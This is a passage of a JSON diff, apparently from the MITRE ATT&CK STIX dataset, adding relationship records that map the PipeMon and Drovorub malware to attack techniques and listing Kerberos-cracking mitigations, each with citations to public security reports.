"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) modules are stored encrypted on disk.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--37451dee-6837-46c5-a9e5-ff64f26f66d2", + "type": "relationship", + "modified": "2020-08-24T13:40:23.233Z", + "created": "2020-08-24T13:40:23.233Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501), its installer, and tools are signed with stolen code-signing certificates.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--ec536758-9478-4bf9-9abd-69755d8382d2", + "type": "relationship", + "modified": "2020-08-24T13:40:23.262Z", + "created": "2020-08-24T13:40:23.262Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) installer can use UAC bypass techniques to install the payload.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--88111958-702b-4bfb-9ad1-c329491df5be", + "type": "relationship", + "modified": "2020-08-24T13:40:23.293Z", + "created": "2020-08-24T13:40:23.293Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can use parent PID spoofing to elevate privileges.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--a979f700-7319-4d37-bb3e-592e3a1bf878", + "type": "relationship", + "modified": "2020-08-24T13:40:23.324Z", + "created": "2020-08-24T13:40:23.324Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can attempt to gain administrative privileges using token impersonation.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--125d8dab-512b-445a-9f28-b2113c714b77", + "type": "relationship", + "modified": "2020-09-29T19:01:24.946Z", + "created": "2020-08-24T13:40:23.348Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can establish persistence by registering a malicious DLL as an alternative Print Processor which is loaded when the print spooler service starts.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--e7cf27d5-f5ab-497b-8379-31730292ed81", + "type": "relationship", + "modified": "2020-08-24T13:40:23.386Z", + "created": "2020-08-24T13:40:23.386Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485", + "target_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", + "relationship_type": "mitigates", + "description": "Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire. Also consider using Group Managed Service Accounts or another third party product such as password vaulting. (Citation: AdSecurity Cracking Kerberos Dec 2015)", + "id": "relationship--6e751301-3697-4851-b55c-259976891406", + "external_references": [ + { + "url": "https://adsecurity.org/?p=2293", + "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", + "source_name": "AdSecurity Cracking Kerberos Dec 2015" + } + ], + "type": "relationship", + "modified": "2020-09-29T16:16:06.786Z", + "created": "2020-08-24T13:43:00.171Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8", + "target_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", + "relationship_type": "mitigates", + "description": "Kerberos preauthentication is enabled by default. Older protocols might not support preauthentication therefore it is possible to have this setting disabled. Make sure that all accounts have preauthentication whenever possible and audit changes to setting. Windows tools such as PowerShell may be used to easily find which accounts have preauthentication disabled. (Citation: Microsoft Preauthentication Jul 2012)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)", + "id": "relationship--3de2faf5-8019-4aad-a317-fb66554cd2c0", + "external_references": [ + { + "source_name": "Microsoft Preauthentication Jul 2012", + "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc961961(v=technet.10)?redirectedfrom=MSDN", + "description": "Microsoft. (2012, July 18). Preauthentication. Retrieved August 24, 2020." + }, + { + "source_name": "Stealthbits Cracking AS-REP Roasting Jun 2019", + "url": "https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/", + "description": "Jeff Warren. (2019, June 27). Cracking Active Directory Passwords with AS-REP Roasting. Retrieved August 24, 2020." + } + ], + "type": "relationship", + "modified": "2020-09-29T16:16:06.816Z", + "created": "2020-08-24T13:43:00.174Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", + "target_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "relationship_type": "subtechnique-of", + "id": "relationship--f5fc2b7c-72d3-47be-8287-9608b6beb63d", + "type": "relationship", + "modified": "2020-08-24T13:43:00.187Z", + "created": "2020-08-24T13:43:00.187Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--ee8af4e9-8f2e-453f-82d2-d43861d9371e", + "type": "relationship", + "modified": "2020-10-16T21:01:17.164Z", + "created": "2020-08-24T14:07:40.400Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can collect and send OS version and computer name as a part of its C2 beacon.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--270c93ba-a3d4-4ace-8fad-691c64c13e2f", + "type": "relationship", + "modified": "2020-10-16T21:01:17.200Z", + "created": "2020-08-24T14:07:40.464Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can check for the presence of ESET and Kaspersky security software.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--f3afa419-b741-4a1c-bb4d-569cde6ab558", + "type": "relationship", + "modified": "2020-08-24T14:07:40.526Z", + "created": "2020-08-24T14:07:40.526Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can inject its modules into various processes using reflective DLL loading.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--4d5f07bd-985d-4dee-8f1b-9143fb158438", + "type": "relationship", + "modified": "2020-09-22T14:03:55.995Z", + "created": "2020-08-24T14:07:40.711Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can iterate over the running processes to find a suitable injection target.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--8ead6aa1-dbbe-4e8f-b542-66af9b5f2c33", + "type": "relationship", + "modified": "2020-08-24T14:07:40.712Z", + "created": "2020-08-24T14:07:40.712Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can send time zone information from a compromised host to C2.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--96f5f2ec-28e6-4ed4-853e-9c6cadbe3dda", + "type": "relationship", + "modified": "2020-10-16T21:01:17.209Z", + "created": "2020-08-24T14:27:37.302Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can install additional modules via C2 commands.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--3e18f486-1e6f-49fa-8b99-4daf615d3e8d", + "type": "relationship", + "modified": "2020-10-16T21:01:17.193Z", + "created": "2020-08-24T14:27:37.363Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) modules are stored on disk with seemingly benign names including use of a file extension associated with a popular word processor.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--ee4e5ea3-3d81-42ab-b259-9970f1f7d736", + "type": "relationship", + "modified": "2020-09-22T14:02:02.320Z", + "created": "2020-08-24T14:27:37.431Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can decrypt password-protected executables.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--d2bc4516-c074-4d44-9931-07ab518de60a", + "type": "relationship", + "modified": "2020-08-24T14:27:37.469Z", + "created": "2020-08-24T14:27:37.469Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) can switch to an alternate C2 domain when a particular date has been reached.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--ecca736a-9b3f-4a1d-bdb8-ff5c55197893", + "type": "relationship", + "modified": "2020-10-16T21:01:17.137Z", + "created": "2020-08-24T14:27:37.493Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "[PipeMon](https://attack.mitre.org/software/S0501) communications are RC4 encrypted.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--9bfcecc9-1a59-427c-9189-59a19c58e201", + "type": "relationship", + "modified": "2020-08-24T14:27:37.524Z", + "created": "2020-08-24T14:27:37.524Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "The [PipeMon](https://attack.mitre.org/software/S0501) communication module can use a custom protocol based on TLS over TCP.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--7b510a6f-3e11-49b3-bf97-a1ca24bca663", + "type": "relationship", + "modified": "2020-08-24T14:27:37.560Z", + "created": "2020-08-24T14:27:37.560Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c5947e1c-1cbc-434c-94b8-27c7e3be0fff", + "target_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--33344564-0586-47fa-965f-ec9b4a462491", + "type": "relationship", + "modified": "2020-08-24T15:01:02.103Z", + "created": "2020-08-24T15:01:02.103Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157", + "target_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", + "relationship_type": "mitigates", + "description": "Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.(Citation: AdSecurity Cracking Kerberos Dec 2015)", + "id": "relationship--b05e473b-ac33-42ce-b7c6-a2a8517def0d", + "external_references": [ + { + "url": "https://adsecurity.org/?p=2293", + "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", + "source_name": "AdSecurity Cracking Kerberos Dec 2015" + } + ], + "type": "relationship", + "modified": "2020-09-29T16:16:06.799Z", + "created": "2020-08-25T15:02:17.284Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "target_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "relationship_type": "uses", + "id": "relationship--949dba3e-e6c9-48a5-8bf6-a2a912c7c3e3", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "(Citation: NSA/FBI Drovorub August 2020)", + "type": "relationship", + "modified": "2020-09-18T20:16:27.419Z", + "created": "2020-08-25T18:10:52.451Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) has de-obsfuscated XOR encrypted payloads in WebSocket messages.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--994846d3-7130-4374-bd6e-278ad870fa94", + "type": "relationship", + "modified": "2020-08-26T18:38:18.208Z", + "created": "2020-08-25T20:11:52.947Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) can use kernel modules to establish persistence.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--2cc2c087-e567-462a-80e6-059fd1276199", + "type": "relationship", + "modified": "2020-08-25T20:11:53.082Z", + "created": "2020-08-25T20:11:53.082Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) can transfer files from the victim machine.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--08a74c86-5a98-4634-a93c-9c192d3e4fc9", + "type": "relationship", + "modified": "2020-08-25T20:11:53.139Z", + "created": "2020-08-25T20:11:53.139Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) can download files to a compromised host.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--f3b7dbe2-1dd5-4d57-a5ef-1764775d5c99", + "type": "relationship", + "modified": "2020-08-25T20:11:53.155Z", + "created": "2020-08-25T20:11:53.155Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--3da780a6-2bd0-47ce-b434-fe513abb7ee5", + "type": "relationship", + "modified": "2020-09-18T20:21:17.456Z", + "created": "2020-08-25T20:11:53.207Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) can use a port forwarding rule on its agent module to relay network traffic through the client module to a remote host on the same network.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--3ff468a6-c444-439e-b095-dda4648f3561", + "type": "relationship", + "modified": "2020-08-26T18:38:18.451Z", + "created": "2020-08-25T20:11:53.215Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 